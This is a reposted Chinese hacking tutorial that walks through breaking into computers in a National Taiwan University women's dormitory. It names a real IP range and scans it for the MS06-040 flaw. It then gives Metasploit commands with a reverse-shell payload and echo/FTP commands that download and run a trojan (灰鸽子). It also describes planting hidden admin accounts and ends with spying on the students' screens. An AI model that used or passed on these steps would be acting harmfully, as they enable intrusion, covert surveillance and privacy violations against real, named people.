首页 » 技术分享 » 入侵台湾大学女生宿舍(转)

入侵台湾大学女生宿舍(转)

 

  首先用纯真IP数据库来查找台湾大学女生宿舍的IP。打开软件后选“地址->IP段”,再在查询字段里面输入“台湾大学”,点查询,出来了很多结果。

  

  我们随便找一段IP,就找140.112.227.0~140.112.227.255吧,是台湾大学女七舍(法学院)的。说干就干,接下来我们就利用微软8月份发布的MS06040漏洞来入侵。要利用这个漏洞,首先当然是扫描,搬出我们的扫描软件rpc-server Scanner。打开扫描软件后,填上IP段140.112.227.1~140.112.227.255。

 

  看到扫描结果这一行,一般显示“Vulnerable”字眼的主机我们就可以用来溢出了。别告诉我你什么都扫不到,扫不到也是很正常的,因为现在好多地方都对ADSL用户发出的数据包限制了。此时你就只有用代理肉鸡或者改线程扫了,至于如何用代理肉鸡或者改线程,这里就不具体说了。我们现在已经扫到140.112.227.104这台机器了,接下来就溢出吧。这里我们使用Metasploit这个工具,Metasploit里面包含了很多溢出程序,当然也包含了ms06040这个漏洞的溢出程序。安装Metasploit后,我们在“开始->程序”里找到Metasploit framework,打开MSFConsole。

  

  在“msf >”后输入“use netapi_ms06_040”,回车;输入“set PAYLOAD win32_reverse”,回车;输入“set RHOST IP”,回车,这里的IP要填上你要溢出的主机IP,也就是140.112.227.104。再输入“set LHOST IP”,回车,这里的IP是当前使用的主机的IP,注意要用公网的IP,如果你在局域网内,就要想办法把自己的主机映射出去。接下来输入“set TARGET 0”,回车。全部完成后输入“exploit”,按回车后就开始溢出了。当出现以下内容时,就说明你已经成功溢出得到一个Shell了。

  msf > use netapi_ms06_040

  msf netapi_ms06_040 > set PAYLOAD win32_reverse

  PAYLOAD -> win32_reverse

  msf netapi_ms06_040(win32_reverse) > set RHOST 140.112.227.104

  RHOST -> 140.112.227.104

  msf netapi_ms06_040(win32_reverse) > set LHOST xxx.xxx.xxx.xxx

  LHOST -> xxx.xxx.xxx.xxx

  msf netapi_ms06_040(win32_reverse) > set TARGET 0

  TARGET -> 0

  msf netapi_ms06_040(win32_reverse) > exploit

  

  • Starting Reverse Handler.
      
  • Detected a Windows xp target
      
  • This will not work on SP2!
      
  • Sending request...
      
  • The server rejected it,trying again…
      
  • Got connection from 140.112.227.104:4321 <-> xxx.xxx.xxx.xxx:1039
      
      Microsoft Windows XP [乜 5.1.2600]
      (C) Copyright 1985-2001 Microsoft Corp.
      
      C:/WINDOWS/system32>
      
      到了这里,说明我们已经入侵成功了。接下来就看你自己想留什么样的后门了。如果是Windows 2000或Windows 2003,我们就可以直接克隆一个隐藏的管理员账号开个3389了。如果对方是Windows XP就比较麻烦了,当你用3389连接时,对方的屏幕会提示是否允许连接。此时怎么办呢?我们可以上传个木马。这里就用灰鸽子吧。至于上传,这可能会难倒一些新手,没关系,告诉你一种好方法。上传的方法有很多,比如用TFTP、写VBS脚本等。我试用过很多方法,觉得对于外网主机来说,最好用的还是写个TXT文件,然后再用FTP执行上传。这种方法需要有个FTP空间,先把你的木马上传到FTP空间,然后在命令行下执行echo命令写一个TXT文件。写TXT文件的命令如下:
      
      echo open 你FTP主机的IP>>1.txt
      echo FTP的用户名>>1.txt
      echo FTP的密码>>1.txt
      echo bin>>1.txt
      echo get 木马的名字.exe>>1.txt
      echo bye>>1.txt
      
      这些代码要一行一行的写,写完一行后回车。全部写完后,我们再来看看是不是写进去了。输入“dir 1.txt”,说明我们的TXT写入成功了。

      由于台湾省的操作系统是繁体中文的,而我的电脑又没安装繁体语言包,里面的繁体字全部显示为乱码。1.txt成功写入后,我们再执行“ftp –s:1.txt”这个命令,稍等一下。

      这里的h.exe就是我做的自动上线免杀灰鸽子服务端。上传成功后,输入h.exe运行。成功后我们还有一件重要的事要做,就是删除我们一开始写入的1.txt,要不你的FTP账号就会被别人看到了,执行“del 1.txt”即可。好拉,安全工作做完了,我们就打开灰鸽子等待肉鸡上线吧。呵呵,不过几秒钟,我们的肉鸡就上线了。

      接下来我们就屏幕监控,看看台湾大学的女学生们都在做些什么。原来台湾省的MM不用QQ,喜欢聊MSN。如果你想和台湾省的MM亲密交流的话,就加上她的MSN吧。

      其实除了MS06040漏洞溢出以外,我们还有很多方法可以拿到shell的,这就要看你自己平时掌握的东西了。好啦,整个入侵过程到此就结束了,要是有什么不明白的地方,欢迎大家到黑防官方论坛发言,我们共同讨论,共同提高!


  •  

转载自原文链接, 如需删除请联系管理员。

原文链接:入侵台湾大学女生宿舍(转),转载请注明来源!

0